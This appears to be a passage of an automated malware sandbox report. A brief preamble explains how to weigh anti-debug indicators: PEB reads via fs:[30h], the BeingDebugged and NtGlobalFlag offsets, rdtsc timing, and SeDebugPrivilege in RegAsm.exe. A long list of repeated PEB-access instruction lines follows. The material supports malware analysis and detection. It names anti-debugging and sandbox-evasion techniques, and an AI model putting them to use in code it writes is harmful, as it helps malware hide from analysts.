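Three caveats when reading the output against the full report. A mov from fs:[30h] is also emitted by ordinary runtime and loader code (PEB->Ldr, heap handles), so the number of distinct functions is the figure to weigh, and a real anti-debug check is confirmed by the offset read next from the PEB (BeingDebugged at +0x02, NtGlobalFlag at +0x68), not by the PEB fetch alone. The Hyper-V and NECVMWar strings sit in explorer.exe's memory because the analysis machine's own devices leak into every process; they describe the sandbox, not something the sample enumerated. Enabling SeDebugPrivilege is routine for PowerShell; the adjustment inside RegAsm.exe, the process that also carries the rdtsc and PEB-reading code functions, is the one that deserves attention.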
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe Code function: 15_2_0294D294 mov eax, dword ptr fs:[00000030h] 15_2_0294D294
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe Code function: 15_2_0294D294 mov eax, dword ptr fs:[00000030h] 15_2_0294D294
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe Code function: 15_2_0292AAB0 mov eax, dword ptr fs:[00000030h] 15_2_0292AAB0
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe Code function: 15_2_0292AAB0 mov eax, dword ptr fs:[00000030h] 15_2_0292AAB0
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe Code function: 15_2_0294FAB0 mov eax, dword ptr fs:[00000030h] 15_2_0294FAB0
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe Code function: 15_2_029152A5 mov eax, dword ptr fs:[00000030h] 15_2_029152A5
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe Code function: 15_2_029152A5 mov eax, dword ptr fs:[00000030h] 15_2_029152A5
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe Code function: 15_2_029152A5 mov eax, dword ptr fs:[00000030h] 15_2_029152A5
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe Code function: 15_2_029152A5 mov eax, dword ptr fs:[00000030h] 15_2_029152A5
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe Code function: 15_2_029152A5 mov eax, dword ptr fs:[00000030h] 15_2_029152A5
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe Code function: 15_2_02942ACB mov eax, dword ptr fs:[00000030h] 15_2_02942ACB
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe Code function: 15_2_02942AE4 mov eax, dword ptr fs:[00000030h] 15_2_02942AE4
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe Code function: 15_2_02915210 mov eax, dword ptr fs:[00000030h] 15_2_02915210
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe Code function: 15_2_02915210 mov ecx, dword ptr fs:[00000030h] 15_2_02915210
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe Code function: 15_2_02915210 mov eax, dword ptr fs:[00000030h] 15_2_02915210
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe Code function: 15_2_02915210 mov eax, dword ptr fs:[00000030h] 15_2_02915210
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe Code function: 15_2_0291AA16 mov eax, dword ptr fs:[00000030h] 15_2_0291AA16
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe Code function: 15_2_0291AA16 mov eax, dword ptr fs:[00000030h] 15_2_0291AA16
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe Code function: 15_2_029DAA16 mov eax, dword ptr fs:[00000030h] 15_2_029DAA16
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe Code function: 15_2_029DAA16 mov eax, dword ptr fs:[00000030h] 15_2_029DAA16
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe Code function: 15_2_02933A1C mov eax, dword ptr fs:[00000030h] 15_2_02933A1C
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe Code function: 15_2_02928A0A mov eax, dword ptr fs:[00000030h] 15_2_02928A0A
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe Code function: 15_2_02954A2C mov eax, dword ptr fs:[00000030h] 15_2_02954A2C
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe Code function: 15_2_02954A2C mov eax, dword ptr fs:[00000030h] 15_2_02954A2C
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe Code function: 15_2_029DEA55 mov eax, dword ptr fs:[00000030h] 15_2_029DEA55
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe Code function: 15_2_029A4257 mov eax, dword ptr fs:[00000030h] 15_2_029A4257
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe Code function: 15_2_02919240 mov eax, dword ptr fs:[00000030h] 15_2_02919240
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe Code function: 15_2_02919240 mov eax, dword ptr fs:[00000030h] 15_2_02919240
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe Code function: 15_2_02919240 mov eax, dword ptr fs:[00000030h] 15_2_02919240
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe Code function: 15_2_02919240 mov eax, dword ptr fs:[00000030h] 15_2_02919240
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe Code function: 15_2_0295927A mov eax, dword ptr fs:[00000030h] 15_2_0295927A
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe Code function: 15_2_029CB260 mov eax, dword ptr fs:[00000030h] 15_2_029CB260
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe Code function: 15_2_029CB260 mov eax, dword ptr fs:[00000030h] 15_2_029CB260
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe Code function: 15_2_029E8A62 mov eax, dword ptr fs:[00000030h] 15_2_029E8A62
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe Code function: 15_2_02942397 mov eax, dword ptr fs:[00000030h] 15_2_02942397
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe Code function: 15_2_0294B390 mov eax, dword ptr fs:[00000030h] 15_2_0294B390
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe Code function: 15_2_029D138A mov eax, dword ptr fs:[00000030h] 15_2_029D138A
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe Code function: 15_2_029CD380 mov ecx, dword ptr fs:[00000030h] 15_2_029CD380
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe Code function: 15_2_02921B8F mov eax, dword ptr fs:[00000030h] 15_2_02921B8F
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe Code function: 15_2_02921B8F mov eax, dword ptr fs:[00000030h] 15_2_02921B8F
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe Code function: 15_2_02944BAD mov eax, dword ptr fs:[00000030h] 15_2_02944BAD
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe Code function: 15_2_02944BAD mov eax, dword ptr fs:[00000030h] 15_2_02944BAD
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe Code function: 15_2_02944BAD mov eax, dword ptr fs:[00000030h] 15_2_02944BAD
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe Code function: 15_2_029E5BA5 mov eax, dword ptr fs:[00000030h] 15_2_029E5BA5
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe Code function: 15_2_029953CA mov eax, dword ptr fs:[00000030h] 15_2_029953CA
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe Code function: 15_2_029953CA mov eax, dword ptr fs:[00000030h] 15_2_029953CA
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe Code function: 15_2_029403E2 mov eax, dword ptr fs:[00000030h] 15_2_029403E2
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe Code function: 15_2_029403E2 mov eax, dword ptr fs:[00000030h] 15_2_029403E2
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe Code function: 15_2_029403E2 mov eax, dword ptr fs:[00000030h] 15_2_029403E2
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe Code function: 15_2_029403E2 mov eax, dword ptr fs:[00000030h] 15_2_029403E2
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe Code function: 15_2_029403E2 mov eax, dword ptr fs:[00000030h] 15_2_029403E2
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe Code function: 15_2_029403E2 mov eax, dword ptr fs:[00000030h] 15_2_029403E2
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe Code function: 15_2_0293DBE9 mov eax, dword ptr fs:[00000030h] 15_2_0293DBE9
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe Code function: 15_2_029D131B mov eax, dword ptr fs:[00000030h] 15_2_029D131B
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe Code function: 15_2_029E8B58 mov eax, dword ptr fs:[00000030h] 15_2_029E8B58
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe Code function: 15_2_0291F358 mov eax, dword ptr fs:[00000030h] 15_2_0291F358
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe Code function: 15_2_0291DB40 mov eax, dword ptr fs:[00000030h] 15_2_0291DB40
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe Code function: 15_2_02943B7A mov eax, dword ptr fs:[00000030h] 15_2_02943B7A
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe Code function: 15_2_02943B7A mov eax, dword ptr fs:[00000030h] 15_2_02943B7A
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe Code function: 15_2_0291DB60 mov ecx, dword ptr fs:[00000030h] 15_2_0291DB60
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe Code function: 15_2_02919080 mov eax, dword ptr fs:[00000030h] 15_2_02919080
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe Code function: 15_2_02993884 mov eax, dword ptr fs:[00000030h] 15_2_02993884
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe Code function: 15_2_02993884 mov eax, dword ptr fs:[00000030h] 15_2_02993884
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe Code function: 15_2_0294F0BF mov ecx, dword ptr fs:[00000030h] 15_2_0294F0BF
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe Code function: 15_2_0294F0BF mov eax, dword ptr fs:[00000030h] 15_2_0294F0BF
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe Code function: 15_2_0294F0BF mov eax, dword ptr fs:[00000030h] 15_2_0294F0BF
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe Code function: 15_2_029420A0 mov eax, dword ptr fs:[00000030h] 15_2_029420A0
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe Code function: 15_2_029420A0 mov eax, dword ptr fs:[00000030h] 15_2_029420A0
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe Code function: 15_2_029420A0 mov eax, dword ptr fs:[00000030h] 15_2_029420A0
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe Code function: 15_2_029420A0 mov eax, dword ptr fs:[00000030h] 15_2_029420A0
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe Code function: 15_2_029420A0 mov eax, dword ptr fs:[00000030h] 15_2_029420A0
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe Code function: 15_2_029420A0 mov eax, dword ptr fs:[00000030h] 15_2_029420A0
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe Code function: 15_2_029590AF mov eax, dword ptr fs:[00000030h] 15_2_029590AF
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe Code function: 15_2_029AB8D0 mov eax, dword ptr fs:[00000030h] 15_2_029AB8D0
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe Code function: 15_2_029AB8D0 mov ecx, dword ptr fs:[00000030h] 15_2_029AB8D0
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe Code function: 15_2_029AB8D0 mov eax, dword ptr fs:[00000030h] 15_2_029AB8D0
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe Code function: 15_2_029AB8D0 mov eax, dword ptr fs:[00000030h] 15_2_029AB8D0
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe Code function: 15_2_029AB8D0 mov eax, dword ptr fs:[00000030h] 15_2_029AB8D0
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe Code function: 15_2_029AB8D0 mov eax, dword ptr fs:[00000030h] 15_2_029AB8D0
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe Code function: 15_2_029140E1 mov eax, dword ptr fs:[00000030h] 15_2_029140E1
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe Code function: 15_2_029140E1 mov eax, dword ptr fs:[00000030h] 15_2_029140E1
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe Code function: 15_2_029140E1 mov eax, dword ptr fs:[00000030h] 15_2_029140E1
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe Code function: 15_2_029158EC mov eax, dword ptr fs:[00000030h] 15_2_029158EC
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe Code function: 15_2_029E4015 mov eax, dword ptr fs:[00000030h] 15_2_029E4015
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe Code function: 15_2_029E4015 mov eax, dword ptr fs:[00000030h] 15_2_029E4015
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe Code function: 15_2_02997016 mov eax, dword ptr fs:[00000030h] 15_2_02997016
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe Code function: 15_2_02997016 mov eax, dword ptr fs:[00000030h] 15_2_02997016
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe Code function: 15_2_02997016 mov eax, dword ptr fs:[00000030h] 15_2_02997016
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe Code function: 15_2_0292B02A mov eax, dword ptr fs:[00000030h] 15_2_0292B02A
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe Code function: 15_2_0292B02A mov eax, dword ptr fs:[00000030h] 15_2_0292B02A
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe Code function: 15_2_0292B02A mov eax, dword ptr fs:[00000030h] 15_2_0292B02A
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe Code function: 15_2_0292B02A mov eax, dword ptr fs:[00000030h] 15_2_0292B02A
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe Code function: 15_2_0294002D mov eax, dword ptr fs:[00000030h] 15_2_0294002D
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe Code function: 15_2_0294002D mov eax, dword ptr fs:[00000030h] 15_2_0294002D
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe Code function: 15_2_0294002D mov eax, dword ptr fs:[00000030h] 15_2_0294002D
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe Code function: 15_2_0294002D mov eax, dword ptr fs:[00000030h] 15_2_0294002D
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe Code function: 15_2_0294002D mov eax, dword ptr fs:[00000030h] 15_2_0294002D
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe Code function: 15_2_02930050 mov eax, dword ptr fs:[00000030h] 15_2_02930050
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe Code function: 15_2_02930050 mov eax, dword ptr fs:[00000030h] 15_2_02930050
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe Code function: 15_2_029E1074 mov eax, dword ptr fs:[00000030h] 15_2_029E1074
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe Code function: 15_2_029D2073 mov eax, dword ptr fs:[00000030h] 15_2_029D2073
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe Code function: 15_2_02942990 mov eax, dword ptr fs:[00000030h] 15_2_02942990
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe Code function: 15_2_0294A185 mov eax, dword ptr fs:[00000030h] 15_2_0294A185
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe Code function: 15_2_0293C182 mov eax, dword ptr fs:[00000030h] 15_2_0293C182
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe Code function: 15_2_029951BE mov eax, dword ptr fs:[00000030h] 15_2_029951BE
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe Code function: 15_2_029951BE mov eax, dword ptr fs:[00000030h] 15_2_029951BE
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe Code function: 15_2_029951BE mov eax, dword ptr fs:[00000030h] 15_2_029951BE
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe Code function: 15_2_029951BE mov eax, dword ptr fs:[00000030h] 15_2_029951BE
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe Code function: 15_2_029461A0 mov eax, dword ptr fs:[00000030h] 15_2_029461A0
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe Code function: 15_2_029461A0 mov eax, dword ptr fs:[00000030h] 15_2_029461A0
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe Code function: 15_2_029D49A4 mov eax, dword ptr fs:[00000030h] 15_2_029D49A4
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe Code function: 15_2_029D49A4 mov eax, dword ptr fs:[00000030h] 15_2_029D49A4
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe Code function: 15_2_029D49A4 mov eax, dword ptr fs:[00000030h] 15_2_029D49A4
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe Code function: 15_2_029D49A4 mov eax, dword ptr fs:[00000030h] 15_2_029D49A4
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe Code function: 15_2_029969A6 mov eax, dword ptr fs:[00000030h] 15_2_029969A6
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe Code function: 15_2_0291B1E1 mov eax, dword ptr fs:[00000030h] 15_2_0291B1E1
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe Code function: 15_2_0291B1E1 mov eax, dword ptr fs:[00000030h] 15_2_0291B1E1
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe Code function: 15_2_0291B1E1 mov eax, dword ptr fs:[00000030h] 15_2_0291B1E1
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe Code function: 15_2_029A41E8 mov eax, dword ptr fs:[00000030h] 15_2_029A41E8
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe Code function: 15_2_02919100 mov eax, dword ptr fs:[00000030h] 15_2_02919100
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe Code function: 15_2_02919100 mov eax, dword ptr fs:[00000030h] 15_2_02919100
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe Code function: 15_2_02919100 mov eax, dword ptr fs:[00000030h] 15_2_02919100
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe Code function: 15_2_0294513A mov eax, dword ptr fs:[00000030h] 15_2_0294513A
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe Code function: 15_2_0294513A mov eax, dword ptr fs:[00000030h] 15_2_0294513A
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe Code function: 15_2_02934120 mov eax, dword ptr fs:[00000030h] 15_2_02934120
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe Code function: 15_2_02934120 mov eax, dword ptr fs:[00000030h] 15_2_02934120
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe Code function: 15_2_02934120 mov eax, dword ptr fs:[00000030h] 15_2_02934120
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe Code function: 15_2_02934120 mov eax, dword ptr fs:[00000030h] 15_2_02934120
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe Code function: 15_2_02934120 mov ecx, dword ptr fs:[00000030h] 15_2_02934120
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe Code function: 15_2_0293B944 mov eax, dword ptr fs:[00000030h] 15_2_0293B944
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe Code function: 15_2_0293B944 mov eax, dword ptr fs:[00000030h] 15_2_0293B944
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe Code function: 15_2_0291B171 mov eax, dword ptr fs:[00000030h] 15_2_0291B171
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe Code function: 15_2_0291B171 mov eax, dword ptr fs:[00000030h] 15_2_0291B171
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe Code function: 15_2_0291C962 mov eax, dword ptr fs:[00000030h] 15_2_0291C962
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe Code function: 15_2_029AFE87 mov eax, dword ptr fs:[00000030h] 15_2_029AFE87
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe Code function: 15_2_029E0EA5 mov eax, dword ptr fs:[00000030h] 15_2_029E0EA5
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe Code function: 15_2_029E0EA5 mov eax, dword ptr fs:[00000030h] 15_2_029E0EA5
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe Code function: 15_2_029E0EA5 mov eax, dword ptr fs:[00000030h] 15_2_029E0EA5
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe Code function: 15_2_029946A7 mov eax, dword ptr fs:[00000030h] 15_2_029946A7
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe Code function: 15_2_029E8ED6 mov eax, dword ptr fs:[00000030h] 15_2_029E8ED6
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe Code function: 15_2_02958EC7 mov eax, dword ptr fs:[00000030h] 15_2_02958EC7
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe Code function: 15_2_029436CC mov eax, dword ptr fs:[00000030h] 15_2_029436CC
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe Code function: 15_2_029CFEC0 mov eax, dword ptr fs:[00000030h] 15_2_029CFEC0
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe Code function: 15_2_029276E2 mov eax, dword ptr fs:[00000030h] 15_2_029276E2
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe Code function: 15_2_029416E0 mov ecx, dword ptr fs:[00000030h] 15_2_029416E0
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe Code function: 15_2_0294A61C mov eax, dword ptr fs:[00000030h] 15_2_0294A61C
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe Code function: 15_2_0294A61C mov eax, dword ptr fs:[00000030h] 15_2_0294A61C
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe Code function: 15_2_0291C600 mov eax, dword ptr fs:[00000030h] 15_2_0291C600
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe Code function: 15_2_0291C600 mov eax, dword ptr fs:[00000030h] 15_2_0291C600
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe Code function: 15_2_0291C600 mov eax, dword ptr fs:[00000030h] 15_2_0291C600
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe Code function: 15_2_02948E00 mov eax, dword ptr fs:[00000030h] 15_2_02948E00
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe Code function: 15_2_029D1608 mov eax, dword ptr fs:[00000030h] 15_2_029D1608
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe Code function: 15_2_029CFE3F mov eax, dword ptr fs:[00000030h] 15_2_029CFE3F
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe Code function: 15_2_0291E620 mov eax, dword ptr fs:[00000030h] 15_2_0291E620
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe Code function: 15_2_02927E41 mov eax, dword ptr fs:[00000030h] 15_2_02927E41
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe Code function: 15_2_02927E41 mov eax, dword ptr fs:[00000030h] 15_2_02927E41
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe Code function: 15_2_02927E41 mov eax, dword ptr fs:[00000030h] 15_2_02927E41
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe Code function: 15_2_02927E41 mov eax, dword ptr fs:[00000030h] 15_2_02927E41
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe Code function: 15_2_02927E41 mov eax, dword ptr fs:[00000030h] 15_2_02927E41
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe Code function: 15_2_02927E41 mov eax, dword ptr fs:[00000030h] 15_2_02927E41
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe Code function: 15_2_029DAE44 mov eax, dword ptr fs:[00000030h] 15_2_029DAE44
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe Code function: 15_2_029DAE44 mov eax, dword ptr fs:[00000030h] 15_2_029DAE44
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe Code function: 15_2_0293AE73 mov eax, dword ptr fs:[00000030h] 15_2_0293AE73
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe Code function: 15_2_0293AE73 mov eax, dword ptr fs:[00000030h] 15_2_0293AE73
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe Code function: 15_2_0293AE73 mov eax, dword ptr fs:[00000030h] 15_2_0293AE73
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe Code function: 15_2_0293AE73 mov eax, dword ptr fs:[00000030h] 15_2_0293AE73
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe Code function: 15_2_0293AE73 mov eax, dword ptr fs:[00000030h] 15_2_0293AE73
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe Code function: 15_2_0292766D mov eax, dword ptr fs:[00000030h] 15_2_0292766D
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe Code function: 15_2_02928794 mov eax, dword ptr fs:[00000030h] 15_2_02928794
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe Code function: 15_2_02997794 mov eax, dword ptr fs:[00000030h] 15_2_02997794
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe Code function: 15_2_02997794 mov eax, dword ptr fs:[00000030h] 15_2_02997794
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe Code function: 15_2_02997794 mov eax, dword ptr fs:[00000030h] 15_2_02997794
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe Code function: 15_2_029537F5 mov eax, dword ptr fs:[00000030h] 15_2_029537F5
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe Code function: 15_2_0293F716 mov eax, dword ptr fs:[00000030h] 15_2_0293F716
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe Code function: 15_2_029AFF10 mov eax, dword ptr fs:[00000030h] 15_2_029AFF10
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe Code function: 15_2_029AFF10 mov eax, dword ptr fs:[00000030h] 15_2_029AFF10
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe Code function: 15_2_029E070D mov eax, dword ptr fs:[00000030h] 15_2_029E070D
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe Code function: 15_2_029E070D mov eax, dword ptr fs:[00000030h] 15_2_029E070D
